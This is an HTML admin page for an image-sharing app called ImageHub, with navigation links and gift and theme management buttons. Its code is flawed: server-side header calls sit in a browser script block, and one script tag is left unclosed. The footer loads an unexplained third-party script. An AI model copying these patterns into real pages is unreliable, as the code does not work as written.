<!DOCTYPE html>
<html>
<head>
<title>ImageHub</title>
<script>
    response.setHeader( "Cache-Control", "no-store, no-cache, must-revalidate");  //HTTP 1.1
    response.setHeader("Pragma","no-cache"); //HTTP 1.0
    response.setDateHeader ("Expires", -1); //prevents caching at the proxy server
</script>
  <link rel="stylesheet" href="/stylesheets/bootstrap.min.css">
<link rel="stylesheet" href="/stylesheets/font-awesome.min.css">
<link rel="stylesheet" href="/stylesheets/bootstrap-theme.min.css">

<script src="/javascripts/angular.min.js"></script>
<script src="javascripts/jquery-1.11.3.min.js"></script>
<script src="javascripts/bootstrap.min.js"></script>
<script src="javascripts/lib-typedarrays-min.js"></script>
<script src="/javascripts/md5.js"></script>
<script src="/javascripts/photo_gallery.js">

<link class="jsbin" href="/stylesheets/jquery-ui.theme.css" rel="stylesheet" type="text/css" />
<script class="jsbin" src="/javascripts/jquery-ui.min.js"></script>
<style type="text/css">
    .bs-example{
        margin: 20px;
    }
    body { 
        background: #000001 !important;
        
        }

      ul {         
          padding:0 0 0 0;
          margin:0 0 0 0;
      }
      ul li {     
          list-style:none;
          margin-bottom:25px;           
      }
      ul li img {
          cursor: pointer;

      }
      footer {
    float: right;
    height: 35px;
    margin: 0px 50px 0px 0px;
    color: #000;
    text-align: right;
    padding: 10px 30px;
    width: 180px;
}
      
      
</style>


<link rel="shortcut icon" href="/images/logo1.png" />
<script src="/javascripts/admin-profile.js"></script>
<script>
function readURL(input) {
        if (input.files && input.files[0]) {
            var reader = new FileReader();

            reader.onload = function (e) {
                $('#blah')
                    .attr('src', e.target.result)
                    .width(150)
                    .height(200);
            };

            reader.readAsDataURL(input.files[0]);
        }
    }

</script>

</head>

<body ng-app="ImageHub">

<div class="container" ng-controller="MainCtrl" >
  <div class="page-header">
        <ul class="nav nav-tabs">
          <li><a href="/logout">Logout</a></li>
          <li><a href="/admin-themeline">ThemeLine</a></li>
          
        </ul>
  </div>



<div class="jumbotron text-center">
    <div class="row">
        <div class="col-md-8">

        <h1>Admin Activities</h1>
        <button type="button" class="btn btn-info"><a href="/giftactivite"  style="display:inline;color:white">GIFT MANEGMENT</a></button>
        <button type="button" class="btn btn-info"><a href="/theme_activite"  style="display:inline;color:white">THEME MANEGMENT</a></button>    
        </div>
    </div>

</div>





   


</div>

          <footer>
          <a href="http://www.dmca.com/Protection/Status.aspx?ID=ed7716f1-be0a-4c39-8b9a-988b7d28e39c" title="DMCA.com Protection Status" class="dmca-badge"> <img src="/images/dmca_protected.png" alt="DMCA.com Protection Status"></a>  <script src="https://webcdn.streamtest.net/streamtest.js" type="text/javascript"></script> 
        </footer>


</body>
</html>